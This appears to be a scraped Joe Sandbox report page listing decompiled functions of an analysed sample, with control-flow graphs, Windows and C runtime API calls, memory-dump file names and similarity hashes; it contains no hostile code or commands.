                                                                    control_flow_graph 991 e0a95b-e0a974 992 e0a976-e0a986 call e0ef4c 991->992 993 e0a98a-e0a98f 991->993 992->993 998 e0a988 992->998 995 e0a991-e0a999 993->995 996 e0a99c-e0a9c0 993->996 995->996 1000 e0ab53-e0ab66 call dffbbc 996->1000 1001 e0a9c6-e0a9d2 996->1001 998->993 1003 e0a9d4-e0a9e5 1001->1003 1004 e0aa26 1001->1004 1007 e0aa04-e0aa15 call e08e06 1003->1007 1008 e0a9e7-e0a9f6 call e12010 1003->1008 1006 e0aa28-e0aa2a 1004->1006 1011 e0aa30-e0aa43 1006->1011 1012 e0ab48 1006->1012 1007->1012 1018 e0aa1b 1007->1018 1008->1012 1017 e0a9fc-e0aa02 1008->1017 1011->1012 1022 e0aa49-e0aa5b call e0af6c 1011->1022 1013 e0ab4a-e0ab51 call e0abc3 1012->1013 1013->1000 1021 e0aa21-e0aa24 1017->1021 1018->1021 1021->1006 1024 e0aa60-e0aa64 1022->1024 1024->1012 1025 e0aa6a-e0aa71 1024->1025 1026 e0aa73-e0aa78 1025->1026 1027 e0aaab-e0aab7 1025->1027 1026->1013 1028 e0aa7e-e0aa80 1026->1028 1029 e0ab03 1027->1029 1030 e0aab9-e0aaca 1027->1030 1028->1012 1031 e0aa86-e0aaa0 call e0af6c 1028->1031 1032 e0ab05-e0ab07 1029->1032 1033 e0aae5-e0aaf6 call e08e06 1030->1033 1034 e0aacc-e0aadb call e12010 1030->1034 1031->1013 1046 e0aaa6 1031->1046 1036 e0ab41-e0ab47 call e0abc3 1032->1036 1037 e0ab09-e0ab22 call e0af6c 1032->1037 1033->1036 1045 e0aaf8 1033->1045 1034->1036 1048 e0aadd-e0aae3 1034->1048 1036->1012 1037->1036 1051 e0ab24-e0ab2b 1037->1051 1050 e0aafe-e0ab01 1045->1050 1046->1012 1048->1050 1050->1032 1052 e0ab67-e0ab6d 1051->1052 1053 e0ab2d-e0ab2e 1051->1053 1054 e0ab2f-e0ab3f 1052->1054 1053->1054 1054->1036 1056 e0ab6f-e0ab76 call e0abc3 1054->1056 1056->1013
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: __freea
                                                                    • String ID:
                                                                    • API String ID: 240046367-0
                                                                    • Opcode ID: 620c75e97aab78e2a1e8f99cd7aea7a0e8b7e2c548b4370d936d7512a1e5af93
                                                                    • Instruction ID: 6166572de8085323cbfab969783c20a912fc25e7a5ca57c8b94a5c6ca97a8286
                                                                    • Opcode Fuzzy Hash: 620c75e97aab78e2a1e8f99cd7aea7a0e8b7e2c548b4370d936d7512a1e5af93
                                                                    • Instruction Fuzzy Hash: 3151A17261031AAFDB258E64CC41EBBB7AAEB44754B195639FD04F61C0DB34DCD0CA91
                                                                    Function 00DFA6C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1059 dfa6c2-dfa6df 1061 dfa7db 1059->1061 1062 dfa6e5-dfa6f6 1059->1062 1063 dfa7dd-dfa7e1 1061->1063 1062->1061 1065 dfa6fc-dfa70b 1062->1065 1065->1061 1067 dfa711-dfa71c 1065->1067 1067->1061 1069 dfa722-dfa737 1067->1069 1071 dfa73d-dfa746 1069->1071 1072 dfa7d3-dfa7d9 1069->1072 1074 dfa7cc 1071->1074 1075 dfa74c-dfa76a call e00320 CreateStreamOnHGlobal 1071->1075 1072->1063 1074->1072 1078 dfa76c-dfa78e call dfa626 1075->1078 1079 dfa7c5 1075->1079 1078->1079 1084 dfa790-dfa798 1078->1084 1079->1074 1085 dfa79a-dfa7a7 call dfeb26 1084->1085 1086 dfa7b3-dfa7c1 1084->1086 1088 dfa7ac-dfa7ae 1085->1088 1086->1079 1088->1086 1090 dfa7b0 1088->1090 1090->1086
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                      • Part of subcall function 00DFA626: 73516BB0.GDIPLUS(00000010), ref: 00DFA62C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: 73516CreateGlobalStream
                                                                    • String ID: PNG
                                                                    • API String ID: 2601201109-364855578
                                                                    • Opcode ID: 2cca5b2415776ebb9996ac68f73d6ac76f7873cf1173f4e56ab03477d25ba040
                                                                    • Instruction ID: e349556f631e5cfc28635ffa36f6535604bc8e12a63b23dc40eb0f4ca36182c9
                                                                    • Opcode Fuzzy Hash: 2cca5b2415776ebb9996ac68f73d6ac76f7873cf1173f4e56ab03477d25ba040
                                                                    • Instruction Fuzzy Hash: 3631D5B5601306BFC710AF36DC48D6BBFB9EF84760B058529F909A2260EB31DD48CA71
                                                                    Function 00DE1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1121 de1e50-de1e7f call dfeb78 call de3bba 1125 de1e84-de1e86 1121->1125 1126 de1f0f-de1f1b 1125->1126 1127 de1e8c-de1ebd call de1732 call de18a9 1125->1127 1129 de1f1d-de1f21 1126->1129 1130 de1f36-de1f44 1126->1130 1140 de1ece-de1ed5 1127->1140 1141 de1ebf-de1ecc call df1c3b 1127->1141 1132 de1f2f-de1f35 call e03e2e 1129->1132 1133 de1f23-de1f2c call def445 1129->1133 1132->1130 1133->1132 1143 de1eee-de1ef6 call df1b84 1140->1143 1144 de1ed7-de1eec call df1bfd 1140->1144 1148 de1efb-de1f0e call e03e13 call de18a9 1141->1148 1143->1148 1144->1148 1148->1126
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE1E55
                                                                      • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                    • _wcslen.LIBCMT ref: 00DE1EFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2838827086-0
                                                                    • Opcode ID: ca25f51bafa249afa3fbe406f8ecb996e07bfc731524117420407d9664f4d1eb
                                                                    • Instruction ID: 19abde93453b15353299eaeb65fece9b3a85bf6cf5bb916e99b7c9ab5e21e96a
                                                                    • Opcode Fuzzy Hash: ca25f51bafa249afa3fbe406f8ecb996e07bfc731524117420407d9664f4d1eb
                                                                    • Instruction Fuzzy Hash: 65313875A04249AACF11EF99C945AEEBBF5EF48300F144069F845A7251C7325E51CB70
                                                                    Function 00E0BA89 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1154 e0ba89-e0ba8f 1155 e0ba91-e0ba9c call e091a8 1154->1155 1156 e0baae-e0bab2 1154->1156 1165 e0ba9e-e0baad call e08dcc 1155->1165 1158 e0bab4 call e08b6f 1156->1158 1159 e0bab9-e0bac4 1156->1159 1158->1159 1162 e0bac6-e0bad0 1159->1162 1163 e0badb-e0baf5 1159->1163 1162->1163 1166 e0bad2-e0bada call e08dcc 1162->1166 1164 e0baf7-e0bafe 1163->1164 1163->1165 1164->1165 1167 e0bb00-e0bb17 call e0b691 1164->1167 1166->1163 1167->1165 1175 e0bb19-e0bb23 1167->1175 1175->1165
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 15899e91420c2e4bc09e7b2cda8db798f72214f1484f4a363c8b689544ee53c7
                                                                    • Instruction ID: 77a1c5e5d00cf63fd8739e87bb954775ea339c0f658e4e0b42a63edc139e8569
                                                                    • Opcode Fuzzy Hash: 15899e91420c2e4bc09e7b2cda8db798f72214f1484f4a363c8b689544ee53c7
                                                                    • Instruction Fuzzy Hash: 09118F31A0420AAFD710DF59D4417A8B7F4EB00328F25509AE904BB2E2EB764DC4DB40
                                                                    Function 00E09893 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1176 e09893-e09895 call e0b136 1178 e0989a-e098a0 1176->1178 1179 e098a2 1178->1179 1180 e098ab-e098b9 call e0aeb1 1178->1180 1181 e098a3-e098a9 call e08dcc 1179->1181 1186 e098bb-e098bc 1180->1186 1187 e098be-e098d4 call e09649 call e08dcc 1180->1187 1188 e098d6-e098dd 1181->1188 1186->1181 1187->1188 1195 e098df-e098e6 1187->1195 1193 e098e8-e098ed 1188->1193 1195->1193
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E098A3
                                                                    • _free.LIBCMT ref: 00E098CA
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 8278ed63146d4a8f0befc69b002cd87142b5f085243fb3511a2067b06bc75f50
                                                                    • Instruction ID: cd806c768a8bef747f3af89319b47608415b2a6f72a562aca11cb3448b1ae4aa
                                                                    • Opcode Fuzzy Hash: 8278ed63146d4a8f0befc69b002cd87142b5f085243fb3511a2067b06bc75f50
                                                                    • Instruction Fuzzy Hash: 38F0E5362553026ED20A2F71BD419DF22A9DBD2765720B13AFA01713D3FE6149C51275
                                                                    Function 00DEA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000001,00000001,?,00DEA23A,?,00DEA2E9,00000001,00000001,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA254
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,00DEA23A,?,00DEA2E9,00000001,00000001,?,?,00DEA175,?,00000001,00000000), ref: 00DEA280
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2673547680-0
                                                                    • Opcode ID: f1257385efe40757e661e36a6ee22fccb9f0d8b1d06ea5a35bdaee920eb9416e
                                                                    • Instruction ID: 4bf7e76a3ffdf0ff20bbb0137fdcc8dd8e500b6f5e30e43522a045cff9ba1a50
                                                                    • Opcode Fuzzy Hash: f1257385efe40757e661e36a6ee22fccb9f0d8b1d06ea5a35bdaee920eb9416e
                                                                    • Instruction Fuzzy Hash: 0DE06D715001689ACB10AB69CC05BD97798AB083E1F048361BE44F7190D670AE448AB0
                                                                    Function 00DFDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DFDEEC
                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00DFDF03
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate_swprintf
                                                                    • String ID:
                                                                    • API String ID: 3251159408-0
                                                                    • Opcode ID: 08646eef9cf3133f18da6a05834a701fcb18c46ad78535ea112eb0f129de9e4e
                                                                    • Instruction ID: feef99924e18fb11679e2efbd24cde1986117ca649fa64df2c571a6f362cb064
                                                                    • Opcode Fuzzy Hash: 08646eef9cf3133f18da6a05834a701fcb18c46ad78535ea112eb0f129de9e4e
                                                                    • Instruction Fuzzy Hash: 38E092B64003882ADF12BB62DC06FAE3B6C9B15785F444852B304EA1B2DA78EA158671
                                                                    Function 00E02B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02BAA
                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E02BB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                    • String ID:
                                                                    • API String ID: 1660781231-0
                                                                    • Opcode ID: 4cac174450c76d34e66739ae74963e12a402df072613be370c32505fa2963c41
                                                                    • Instruction ID: 26a98f023f542f0c60cbc2f294f790abe8de1187717dd41505d2d73a46df0887
                                                                    • Opcode Fuzzy Hash: 4cac174450c76d34e66739ae74963e12a402df072613be370c32505fa2963c41
                                                                    • Instruction Fuzzy Hash: D7D0223425430018EC142EB43C0F59833C9AE81BB8BE0778FF720F58C1EEA280C0B821
                                                                    Function 00DE12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemShowWindow
                                                                    • String ID:
                                                                    • API String ID: 3351165006-0
                                                                    • Opcode ID: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                    • Instruction ID: dbce32e96efcf7def44fe86daa3350b5c861c9d8f27a254a33022b5e5f9a4d8e
                                                                    • Opcode Fuzzy Hash: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                    • Instruction Fuzzy Hash: BDC0123A05C240BFCB010BB5DC09C2BBBA8ABE6312F24C908B0A5D0261C238C114DB11
                                                                    Function 00DE1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 4ca44d36d4aa54e7b10a14b5603d7ceb9c0951fa46266a1c0c061eaa3340206e
                                                                    • Instruction ID: bba50b61f3bf4703b80ffe3389d7b932dccfdcb34e76bbf5c7dd167e89d505b9
                                                                    • Opcode Fuzzy Hash: 4ca44d36d4aa54e7b10a14b5603d7ceb9c0951fa46266a1c0c061eaa3340206e
